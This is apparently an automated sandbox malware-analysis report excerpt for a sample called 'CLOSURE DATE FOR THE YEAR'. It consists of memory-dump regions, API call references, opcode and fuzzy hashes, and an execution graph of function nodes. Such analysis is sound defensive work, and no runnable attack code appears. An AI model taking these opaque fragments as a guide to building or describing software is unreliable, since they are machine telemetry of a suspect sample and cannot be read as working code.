                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0738F6E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: b38ea5479831b25867920a0fe63533ed700c37f1e0de846d98bae2822b945378
                                                                                    • Instruction ID: efc59c075d74df03f13e27576e1b99acdda2d3b39db0b626314de5f73b5f263c
                                                                                    • Opcode Fuzzy Hash: b38ea5479831b25867920a0fe63533ed700c37f1e0de846d98bae2822b945378
                                                                                    • Instruction Fuzzy Hash: D01103B590034ADFDB50DF9AC449BDEBBF8EB48324F208419E559A7310C375A944CFA5
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0079E6FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 2ae5ec37c530bfadd4bdb127f9985836d7127b6b4376120b482be6e6259edffb
                                                                                    • Instruction ID: e0328f2d45cc958bfb85a4448aec4bbe5f31f2cf0e00067aeed6880b85068959
                                                                                    • Opcode Fuzzy Hash: 2ae5ec37c530bfadd4bdb127f9985836d7127b6b4376120b482be6e6259edffb
                                                                                    • Instruction Fuzzy Hash: 9811E0B5D00349CFCB10DF9AD444ADEFBF4AB88324F10842AD459A7210D379A545CFA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a4801fe0acfa794c6c51432b85d7e5e34ef2bdb54f241e15106ebb4c13d3358
                                                                                    • Instruction ID: 9db323fd58cf075f826e0de350bd75256a9a0a8c641df1ae597e9c1932df4f03
                                                                                    • Opcode Fuzzy Hash: 2a4801fe0acfa794c6c51432b85d7e5e34ef2bdb54f241e15106ebb4c13d3358
                                                                                    • Instruction Fuzzy Hash: 1921F4B1504244DFEB15DF14E9C0B16BF65FB94314F20C169DD094B257C33AEC56C6A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753233629.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_74d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d47895b2a8dabbe56de21c11320dada109cdcea9b64dab9ffcec174b83129423
                                                                                    • Instruction ID: e12bb59098feee0ef580e86d68e2e842e5fc6f4f074ff091d886f1aa253b679c
                                                                                    • Opcode Fuzzy Hash: d47895b2a8dabbe56de21c11320dada109cdcea9b64dab9ffcec174b83129423
                                                                                    • Instruction Fuzzy Hash: D721F271604204DFCB24DF14D9C4B26BBA5EB88314F20C56DD88A4B2A6C37ADC47CA61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction ID: 050667b5e60e1d3bb874a32d8c8e2aef450ce61532c38ab952fc9ecfbacb2604
                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction Fuzzy Hash: EC11CD72404280CFDB12CF10E5C4B16BF62FB94324F24C2A9DC090A256C33AE85ACBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753233629.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_74d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                    • Instruction ID: e0e0c48d57203e7c4b83f945a3f6e695e3e606c110f6abd42c3073c828a0a358
                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                    • Instruction Fuzzy Hash: 5D119D75504284DFDB25CF14D5C4B16FFA2FB88314F24C6AED8494B666C33AD84ACBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b432d43552eb7d19491eb29f6fa9055e04eae35c99b9e57a27a68bd9f16652a7
                                                                                    • Instruction ID: 48c2c7cee60f6cbb97beb943c01d30389ad340818b13082dd274bf5c1b39e042
                                                                                    • Opcode Fuzzy Hash: b432d43552eb7d19491eb29f6fa9055e04eae35c99b9e57a27a68bd9f16652a7
                                                                                    • Instruction Fuzzy Hash: 4B01A2715083449AF7308A29DD847A7BFA8EF45325F28C52AED094A297D37D9C44C6B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 120bda339beffb4309c827e7f3705bbdd1635b29ef2e3ebb5a94a064207b1e88
                                                                                    • Instruction ID: 97b87f678c663e4556b810c4ebd63e1c2b38b5ce8136c651ed5fa9a1b5dd4716
                                                                                    • Opcode Fuzzy Hash: 120bda339beffb4309c827e7f3705bbdd1635b29ef2e3ebb5a94a064207b1e88
                                                                                    • Instruction Fuzzy Hash: 65F0C2710043449AE7208A1ADC84B66FFA8EB90334F18C55AED080E283C3799C44CAB1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: )dKD$O (
                                                                                    • API String ID: 0-299907402
                                                                                    • Opcode ID: f19ecf9341c827a88c47697e8082acc929e86c2dbcbac60d82cdb86fcf69e695
                                                                                    • Instruction ID: 3909662463d5c633869cdd65eb62c21d4c892fee95d26ecdf0ebe4ec5a7b2ded
                                                                                    • Opcode Fuzzy Hash: f19ecf9341c827a88c47697e8082acc929e86c2dbcbac60d82cdb86fcf69e695
                                                                                    • Instruction Fuzzy Hash: F3410731B10205DFCB54DB29D88155BB7F1FB85300B10CC2AD15ADB761D238E842CF62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ffc4a67711656582da6a46ade0dd44d6cdc0bd0a7b9b11b019e1e05741362ac5
                                                                                    • Instruction ID: 861426c464d4c3ba4ee18bcbbb640e8c4aca2b9a692dbd05e2a149a47ce27d8d
                                                                                    • Opcode Fuzzy Hash: ffc4a67711656582da6a46ade0dd44d6cdc0bd0a7b9b11b019e1e05741362ac5
                                                                                    • Instruction Fuzzy Hash: 97D14BF0E002168FDB54DF59C584ABDBBF6AF89304F258169E418AB252D735ED42CFA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c05fafea83d3119865b4fd8079c42ac120b6dd7ef3acc6cd9c80b395dba54d1d
                                                                                    • Instruction ID: aef909a0564431c48cd3648b4d5f5db28039caaa0960c6f9a92f0186b79bc13f
                                                                                    • Opcode Fuzzy Hash: c05fafea83d3119865b4fd8079c42ac120b6dd7ef3acc6cd9c80b395dba54d1d
                                                                                    • Instruction Fuzzy Hash: FDE1FCB4E102198FDB54DFA9C5809AEFBB2BF49304F24C16AE419AB355D734AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a53755adbe6369144bd1c822059eed8d1c2e0c617004a26cf9344c2545d61d6
                                                                                    • Instruction ID: c3cda99eeab91836fc92301ee832a50fe2f86b32162cbcddbb3410ed41940592
                                                                                    • Opcode Fuzzy Hash: 5a53755adbe6369144bd1c822059eed8d1c2e0c617004a26cf9344c2545d61d6
                                                                                    • Instruction Fuzzy Hash: DFE1FBB4E102198FDB54DFA9C5809AEFBB2FF49304F648169E419AB356D730AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76441728f656abc95a2c8a8a307cd4fa5ff7fc60bd7f77c6b8b01a3a2b73872c
                                                                                    • Instruction ID: 2ed9f0eb3222c47937ad023e830fd0d5094896958022a46ca7d63c0d65a57ab2
                                                                                    • Opcode Fuzzy Hash: 76441728f656abc95a2c8a8a307cd4fa5ff7fc60bd7f77c6b8b01a3a2b73872c
                                                                                    • Instruction Fuzzy Hash: A0E10CB4E102198FDB14DFA9C5809AEFBB2BF89304F648159E419AB356D731AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ab29859ebad6f6595a246f133f576feba85831af0fe2a1f7e5b74b0250d3d99b
                                                                                    • Instruction ID: 64d858d1365084d9541e6bb52f78f3de049eec3377543e7a9240b94605c490f1
                                                                                    • Opcode Fuzzy Hash: ab29859ebad6f6595a246f133f576feba85831af0fe2a1f7e5b74b0250d3d99b
                                                                                    • Instruction Fuzzy Hash: 14E10DB4E012198FDB14DFA9C580AAEFBB2BF49304F24D15AE419AB355D730AD42CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f22b2c94ad96a4c0d330ffae4903375842618328025886e24dc964381747f6e
                                                                                    • Instruction ID: 4e115512b46c1c93db1fa5135b58c2f674cda0833e22115ad3b199a2efe0430b
                                                                                    • Opcode Fuzzy Hash: 8f22b2c94ad96a4c0d330ffae4903375842618328025886e24dc964381747f6e
                                                                                    • Instruction Fuzzy Hash: E7E11CB4E002198FDB14DFA9C580AAEFBF2BF89304F248159E419AB355D735AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cdd20a4a108891dc2765ed05b3c6fa9d80c5b3e62c8574040848aa181541255e
                                                                                    • Instruction ID: 7ba64766f8b1d0f5bbb5791f5e4365758178e5dbba79ce3d002da97a88f4cd93
                                                                                    • Opcode Fuzzy Hash: cdd20a4a108891dc2765ed05b3c6fa9d80c5b3e62c8574040848aa181541255e
                                                                                    • Instruction Fuzzy Hash: D5510EB4E052198FDB14DFA9C5805AEFBF2BF89304F14C16AE418A7256D7346D42CFA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9a57a24ec3d25d11e06c1d4c12d47d9670d3c9b2ae9c4e6ec7b909bd919f5a5a
                                                                                    • Instruction ID: e00971b3905447caf80ff04b7a759144627d59950da13f6d7859ab972e8d6b4a
                                                                                    • Opcode Fuzzy Hash: 9a57a24ec3d25d11e06c1d4c12d47d9670d3c9b2ae9c4e6ec7b909bd919f5a5a
                                                                                    • Instruction Fuzzy Hash: 9E31A4B5F142198FCF00CF99D88589EFBF6FB88710F648526E509EB351D238DA418B91

                                                                                    Execution Graph

                                                                                    Execution Coverage:31.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:4.4%
                                                                                    Total number of Nodes:1846
                                                                                    Total number of Limit Nodes:94
                                                                                    execution_graph 9707 40c640 9734 404bee 9707->9734 9710 404bee 6 API calls 9711 40c66b 9710->9711 9713 404bee 6 API calls 9711->9713 9719 40c708 9711->9719 9712 402bab 2 API calls 9714 40c70f 9712->9714 9715 40c683 9713->9715 9716 40c701 9715->9716 9717 404bee 6 API calls 9715->9717 9718 402bab 2 API calls 9716->9718 9722 40c694 9717->9722 9718->9719 9719->9712 9720 40c6f8 9721 402bab 2 API calls 9720->9721 9721->9716 9722->9720 9741 40c522 9722->9741 9724 40c6a9 9725 40c6ef 9724->9725 9727 405872 4 API calls 9724->9727 9726 402bab 2 API calls 9725->9726 9726->9720 9728 40c6c5 9727->9728 9729 405872 4 API calls 9728->9729 9730 40c6d5 9729->9730 9731 405872 4 API calls 9730->9731 9732 40c6e7 9731->9732 9733 402bab 2 API calls 9732->9733 9733->9725 9735 402b7c 2 API calls 9734->9735 9737 404bff 9735->9737 9736 404c3b 9736->9710 9736->9714 9737->9736 9738 4031e5 4 API calls 9737->9738 9739 404c28 9738->9739 9739->9736 9740 402bab 2 API calls 9739->9740 9740->9736 9742 402b7c 2 API calls 9741->9742 9743 40c542 9742->9743 9743->9724 9744 405941 9745 4031e5 4 API calls 9744->9745 9746 405954 9745->9746 8311 409046 8324 413b28 8311->8324 8313 40906d 8315 405b6f 6 API calls 8313->8315 8314 40904e 8314->8313 8316 403fbf 7 API calls 8314->8316 8317 40907c 8315->8317 8316->8313 8318 409092 8317->8318 8328 409408 8317->8328 8320 4090a3 8318->8320 8323 402bab 2 API calls 8318->8323 8322 402bab 2 API calls 8322->8318 8323->8320 8325 413b31 8324->8325 8326 413b38 8324->8326 8327 404056 6 API calls 8325->8327 8326->8314 8327->8326 8329 409413 8328->8329 8330 40908c 8329->8330 8342 409d36 8329->8342 8330->8322 8341 40945c 8448 40a35d 8341->8448 8343 409d43 8342->8343 8344 40a35d 4 API calls 8343->8344 8345 409d55 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409d8b 8346->8347 8348 4031e5 4 API calls 8347->8348 8349 409dd0 8348->8349 8350 405b6f 6 API calls 8349->8350 8381 409423 8349->8381 8352 409df7 8350->8352 8351 409e1c 8353 4031e5 4 API calls 8351->8353 8351->8381 8352->8351 8355 402bab 2 API calls 8352->8355 8354 409e62 8353->8354 8356 4031e5 4 API calls 8354->8356 8355->8351 8357 409e82 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ea2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409ec2 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409ee2 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409f02 8364->8365 8366 4031e5 4 API calls 8365->8366 8367 409f22 8366->8367 8368 4031e5 4 API calls 8367->8368 8371 409f42 8368->8371 8369 40a19b 8370 408b2c 4 API calls 8369->8370 8370->8381 8371->8369 8372 409fa3 8371->8372 8373 405b6f 6 API calls 8372->8373 8372->8381 8374 409fbd 8373->8374 8375 40a02c 8374->8375 8376 402bab 2 API calls 8374->8376 8377 4031e5 4 API calls 8375->8377 8403 40a16d 8375->8403 8379 409fd7 8376->8379 8380 40a070 8377->8380 8378 402bab 2 API calls 8378->8381 8382 405b6f 6 API calls 8379->8382 8383 4031e5 4 API calls 8380->8383 8381->8341 8404 4056bf 8381->8404 8385 409fe5 8382->8385 8384 40a090 8383->8384 8387 4031e5 4 API calls 8384->8387 8385->8375 8386 402bab 2 API calls 8385->8386 8388 409fff 8386->8388 8389 40a0b0 8387->8389 8390 405b6f 6 API calls 8388->8390 8392 4031e5 4 API calls 8389->8392 8391 40a00d 8390->8391 8391->8375 8394 40a021 8391->8394 8393 40a0d0 8392->8393 8396 4031e5 4 API calls 8393->8396 8395 402bab 2 API calls 8394->8395 8395->8381 8397 40a0f0 8396->8397 8398 4031e5 4 API calls 8397->8398 8399 40a110 8398->8399 8400 40a134 8399->8400 8401 4031e5 4 API calls 8399->8401 8400->8403 8458 408b2c 8400->8458 8401->8400 8403->8378 8403->8381 8405 402b7c 2 API calls 8404->8405 8407 4056cd 8405->8407 8406 4056d4 8409 408c4d 8406->8409 8407->8406 8408 402b7c 2 API calls 8407->8408 8408->8406 8410 413ba4 6 API calls 8409->8410 8411 408c5c 8410->8411 8412 408f02 8411->8412 8413 408f3a 8411->8413 8416 40903e 8411->8416 8415 405b6f 6 API calls 8412->8415 8414 405b6f 6 API calls 8413->8414 8430 408f51 8414->8430 8417 408f0c 8415->8417 8432 413aca 8416->8432 8417->8416 8421 408f31 8417->8421 8461 40a1b6 8417->8461 8419 405b6f 6 API calls 8419->8430 8420 402bab 2 API calls 8420->8416 8421->8420 8423 409031 8424 402bab 2 API calls 8423->8424 8424->8421 8425 409022 8426 402bab 2 API calls 8425->8426 8427 409028 8426->8427 8428 402bab 2 API calls 8427->8428 8428->8421 8429 402bab GetProcessHeap HeapFree 8429->8430 8430->8416 8430->8419 8430->8421 8430->8423 8430->8425 8430->8429 8431 40a1b6 14 API calls 8430->8431 8495 4044ee 8430->8495 8431->8430 8433 413ad7 8432->8433 8441 409451 8432->8441 8434 405781 4 API calls 8433->8434 8435 413af0 8434->8435 8436 405781 4 API calls 8435->8436 8437 413afe 8436->8437 8438 405762 4 API calls 8437->8438 8439 413b0e 8438->8439 8440 405781 4 API calls 8439->8440 8439->8441 8440->8441 8442 405695 8441->8442 8443 4056a0 8442->8443 8447 4056b9 8442->8447 8444 402bab 2 API calls 8443->8444 8445 4056b3 8444->8445 8446 402bab 2 API calls 8445->8446 8446->8447 8447->8341 8449 40a368 8448->8449 8450 40a39a 8448->8450 8455 4031e5 4 API calls 8449->8455 8451 40a3af 8450->8451 8452 4031e5 4 API calls 8450->8452 8453 40a3ca 8451->8453 8456 408b2c 4 API calls 8451->8456 8452->8451 8454 40a38a 8453->8454 8457 408b2c 4 API calls 8453->8457 8454->8330 8455->8454 8456->8453 8457->8454 8459 4031e5 4 API calls 8458->8459 8460 408b3e 8459->8460 8460->8403 8462 40a202 8461->8462 8463 40a1c3 8461->8463 8617 405f08 8462->8617 8464 405b6f 6 API calls 8463->8464 8467 40a1d0 8464->8467 8466 40a1fc 8466->8421 8467->8466 8470 40a1f3 8467->8470 8505 40a45b 8467->8505 8469 40a333 8471 402bab 2 API calls 8469->8471 8473 402bab 2 API calls 8470->8473 8471->8466 8473->8466 8474 405b6f 6 API calls 8476 40a245 8474->8476 8475 40a25d 8477 405b6f 6 API calls 8475->8477 8476->8475 8478 413a58 13 API calls 8476->8478 8483 40a26b 8477->8483 8480 40a257 8478->8480 8479 40a28b 8481 405b6f 6 API calls 8479->8481 8482 402bab 2 API calls 8480->8482 8489 40a297 8481->8489 8482->8475 8483->8479 8484 40a284 8483->8484 8624 40955b 8483->8624 8487 402bab 2 API calls 8484->8487 8485 40a2b7 8485->8469 8488 405b6f 6 API calls 8485->8488 8493 402bab 2 API calls 8485->8493 8641 4098a7 8485->8641 8487->8479 8488->8485 8489->8485 8490 40a2b0 8489->8490 8631 40968e 8489->8631 8492 402bab 2 API calls 8490->8492 8492->8485 8493->8485 8496 402b7c 2 API calls 8495->8496 8497 404512 8496->8497 8499 404585 GetLastError 8497->8499 8500 402bab 2 API calls 8497->8500 8503 40457c 8497->8503 8504 402b7c 2 API calls 8497->8504 8896 4044a7 8497->8896 8501 404592 8499->8501 8499->8503 8500->8497 8502 402bab 2 API calls 8501->8502 8502->8503 8503->8430 8504->8497 8650 40642c 8505->8650 8507 40a469 8508 40c4ff 8507->8508 8653 4047e6 8507->8653 8508->8470 8511 4040bb 12 API calls 8512 40bf88 8511->8512 8512->8508 8513 403c90 8 API calls 8512->8513 8514 40bfaa 8513->8514 8515 402b7c 2 API calls 8514->8515 8517 40bfc1 8515->8517 8516 40c4f3 8518 403f9e 5 API calls 8516->8518 8519 40c3aa 8517->8519 8660 40a423 8517->8660 8518->8508 8519->8516 8522 4056bf 2 API calls 8519->8522 8525 40c4e3 8519->8525 8520 402bab 2 API calls 8520->8516 8524 40c3d2 8522->8524 8524->8525 8527 4040bb 12 API calls 8524->8527 8525->8520 8526 405f08 4 API calls 8528 40c005 8526->8528 8529 40c3f3 8527->8529 8530 40c021 8528->8530 8663 40a43f 8528->8663 8532 40c4d1 8529->8532 8720 405a52 8529->8720 8531 4031e5 4 API calls 8530->8531 8534 40c034 8531->8534 8537 413aca 4 API calls 8532->8537 8543 4031e5 4 API calls 8534->8543 8538 40c4dd 8537->8538 8541 405695 2 API calls 8538->8541 8539 40c411 8725 405a87 8539->8725 8540 402bab 2 API calls 8540->8530 8541->8525 8549 40c04d 8543->8549 8544 40c4b3 8545 402bab 2 API calls 8544->8545 8547 40c4cb 8545->8547 8546 405a52 4 API calls 8557 40c423 8546->8557 8548 403f9e 5 API calls 8547->8548 8548->8532 8551 4031e5 4 API calls 8549->8551 8550 405a87 4 API calls 8550->8557 8552 40c085 8551->8552 8554 4031e5 4 API calls 8552->8554 8553 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8553->8557 8555 40c09c 8554->8555 8558 4031e5 4 API calls 8555->8558 8556 402bab 2 API calls 8556->8557 8557->8544 8557->8546 8557->8550 8557->8553 8557->8556 8559 40c0b3 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c0ca 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c0e7 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c100 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c119 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c132 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c14b 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c164 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c17d 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c196 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1af 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1c8 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c1de 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c1f4 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c20d 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c226 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c23f 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c258 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c273 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c28a 8596->8597 8598 4031e5 4 API calls 8597->8598 8601 40c2d5 8598->8601 8599 40c3a2 8600 402bab 2 API calls 8599->8600 8600->8519 8601->8599 8602 4031e5 4 API calls 8601->8602 8603 40c315 8602->8603 8604 40c38b 8603->8604 8666 404866 8603->8666 8605 403c40 5 API calls 8604->8605 8607 40c397 8605->8607 8609 403c40 5 API calls 8607->8609 8609->8599 8610 40c382 8612 403c40 5 API calls 8610->8612 8612->8604 8614 406c4c 6 API calls 8615 40c355 8614->8615 8615->8610 8690 4126a7 8615->8690 8618 4031e5 4 API calls 8617->8618 8619 405f1d 8618->8619 8620 405f55 8619->8620 8621 402b7c 2 API calls 8619->8621 8620->8466 8620->8469 8620->8474 8620->8475 8622 405f36 8621->8622 8622->8620 8623 4031e5 4 API calls 8622->8623 8623->8620 8625 409673 8624->8625 8630 40956d 8624->8630 8625->8484 8626 408b45 6 API calls 8626->8630 8627 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8627->8630 8628 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8628->8630 8629 402bab GetProcessHeap HeapFree 8629->8630 8630->8625 8630->8626 8630->8627 8630->8628 8630->8629 8632 4040bb 12 API calls 8631->8632 8636 4096a9 8632->8636 8633 40989f 8633->8490 8634 409896 8635 403f9e 5 API calls 8634->8635 8635->8633 8636->8633 8636->8634 8638 408b45 6 API calls 8636->8638 8639 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8636->8639 8640 402bab GetProcessHeap HeapFree 8636->8640 8889 4059d8 8636->8889 8638->8636 8639->8636 8640->8636 8642 4040bb 12 API calls 8641->8642 8648 4098c1 8642->8648 8643 4099fb 8643->8485 8644 4099f3 8645 403f9e 5 API calls 8644->8645 8645->8643 8646 4059d8 4 API calls 8646->8648 8647 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8647->8648 8648->8643 8648->8644 8648->8646 8648->8647 8649 402bab GetProcessHeap HeapFree 8648->8649 8649->8648 8651 4031e5 4 API calls 8650->8651 8652 406441 GetNativeSystemInfo 8651->8652 8652->8507 8654 4031e5 4 API calls 8653->8654 8657 40480a 8654->8657 8655 40485d 8655->8508 8655->8511 8656 4031e5 4 API calls 8656->8657 8657->8655 8657->8656 8658 40484f 8657->8658 8659 403c40 5 API calls 8658->8659 8659->8655 8661 4031e5 4 API calls 8660->8661 8662 40a435 8661->8662 8662->8526 8664 4031e5 4 API calls 8663->8664 8665 40a451 8664->8665 8665->8540 8667 4031e5 4 API calls 8666->8667 8668 40487c 8667->8668 8668->8610 8669 406c4c 8668->8669 8730 4068eb 8669->8730 8671 406e02 8671->8614 8672 406cab 8742 40469b 8672->8742 8673 406c6c 8673->8671 8673->8672 8739 406894 8673->8739 8680 406df1 8681 40469b 4 API calls 8680->8681 8681->8671 8682 406cef 8682->8680 8683 4031e5 4 API calls 8682->8683 8684 406d26 8683->8684 8684->8680 8685 40771e 6 API calls 8684->8685 8689 406d57 8685->8689 8686 406da2 8687 4031e5 4 API calls 8686->8687 8687->8680 8689->8686 8755 4068b0 8689->8755 8691 4126bb 8690->8691 8692 4126d1 8690->8692 8693 412840 8691->8693 8811 40488c 8691->8811 8692->8693 8817 407055 8692->8817 8693->8610 8697 412837 8698 403c40 5 API calls 8697->8698 8698->8693 8701 41281e 